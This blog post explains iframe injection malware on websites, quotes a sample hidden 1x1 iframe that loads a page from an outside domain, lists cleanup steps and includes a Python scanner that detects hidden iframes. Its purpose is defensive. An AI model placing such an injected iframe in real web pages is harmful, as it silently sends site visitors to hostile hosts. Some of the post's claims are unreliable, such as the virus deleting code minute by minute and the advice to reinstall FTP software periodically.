Friday, October 2, 2009

How to remove iframe virus

What is an iframe: An iframe is an inline frame that places another HTML document in a frame inside a normal HTML document. It was first introduced by Microsoft in 1997. The iframe tag is now widely supported by all visual browsers. Unlike an object element, an inline frame may be the "target" frame for links defined in other elements, and it may be "selected" by a browser as the focus for printing, viewing HTML source, etc.

The opening <iframe> tag must be closed by </iframe>, both written in < > tag syntax. Content between the iframe tags is used as alternative text to be displayed if the browser does not support iframes. The iframe element is invalid in Strict DTDs and in XHTML version 1.1. Inline frames have, at times, been exploited to illicitly inject code into a website.

An iframe injection is a virus that is written into index.php and other .html, .php, .asp, etc. files.

A sample iframe virus code might look like: <iframe src="http://superbetfair.cn/in.cgi?income43" width=1 height=1 style="visibility: hidden"></iframe>

First, these iframe virus codes are injected into index.php files, where they are placed at the end of the code. Then, minute by minute, the virus starts to delete the code from the rear end. As a result, your site will not be displayed, and you will see a message like 'unknown character found in …./index.php on line ....'. It will also prevent you from accessing the login page. The iframe virus uses a very small frame to insert unexpected entries. If your site is infected by the iframe virus, you and anyone else won't be able to browse these specific pages and will get a warning message from Google/Mozilla.


To remove the iframe virus from your site, follow these steps:
1. Back up everything, including the database, and download these files as a .zip file to a clean computer.
2. Reinstall your Windows OS and remove the trojan from your computer using an antivirus.
3. Clean your code, removing all iframes and jscript code that have been inserted by the trojan.
4. Check your databases and remove suspicious code from there too.
5. Change your FTP password and reinstall the FTP client software.
6. Upload the cleaned version of your website and database.
7. Change the permissions of all infected / index files to 444 so that they are not writable.
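
For step 3, a scan of the downloaded backup helps locate every injected frame before cleaning by hand. The following is an added example, not code from the original post: it flags iframe tags that are sized 0 or 1 or hidden with CSS, as in the sample above. The function names, the extra .htm extension and the hiding heuristics are assumptions.

```python
import re
from pathlib import Path

# File types the post names as injection targets; .htm is added as an assumption.
WEB_EXTS = {".php", ".html", ".htm", ".asp"}

IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.IGNORECASE)
SRC_RE = re.compile(r"""\bsrc\s*=\s*["']?([^"'\s>]+)""", re.IGNORECASE)
# Heuristics for an invisible frame (assumed, modelled on the sample in the post):
# a width/height attribute of 0 or 1, or CSS that hides the element.
TINY_RE = re.compile(
    r"""\b(?:width|height)\s*=\s*["']?[01](?:px)?["']?(?=[\s>/])""", re.IGNORECASE)
HIDDEN_RE = re.compile(r"visibility\s*:\s*hidden|display\s*:\s*none", re.IGNORECASE)


def find_hidden_iframes(text):
    """Return (line_number, src, tag) for every iframe tag that looks invisible."""
    hits = []
    for m in IFRAME_RE.finditer(text):
        tag = m.group(0)
        if TINY_RE.search(tag) or HIDDEN_RE.search(tag):
            src = SRC_RE.search(tag)
            line = text.count("\n", 0, m.start()) + 1
            hits.append((line, src.group(1) if src else "", tag))
    return hits


def scan_tree(root):
    """Scan a local copy of the site (the backup from step 1); map path -> hits."""
    report = {}
    for path in sorted(Path(root).rglob("*")):
        if path.is_file() and path.suffix.lower() in WEB_EXTS:
            hits = find_hidden_iframes(path.read_text(errors="replace"))
            if hits:
                report[str(path)] = hits
    return report


if __name__ == "__main__":
    import sys
    root = sys.argv[1] if len(sys.argv) > 1 else "."
    for path, hits in scan_tree(root).items():
        for line, src, _tag in hits:
            print(f"{path}:{line}: hidden iframe -> {src}")
```

Each hit is a candidate to review before deleting, since a site may contain hidden frames of its own; the compressed JavaScript variant mentioned below is not covered by these patterns.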

It is important to note that the attack is caused by a trojan that resides on your computer (picked up either from removable devices like your music player or pen drive, or from infected websites you have visited), steals your FTP credentials and adds code to your website files. This trojan steals all your FTP credentials, which are then used to access your site accounts and modify your code, inserting an iframe in some cases; in other cases, this kind of virus inserts compressed JavaScript code. So, to be safe in the future, you must change your FTP account password. Never use the FTP software for a long time. Rather, try to reinstall it from time to time.
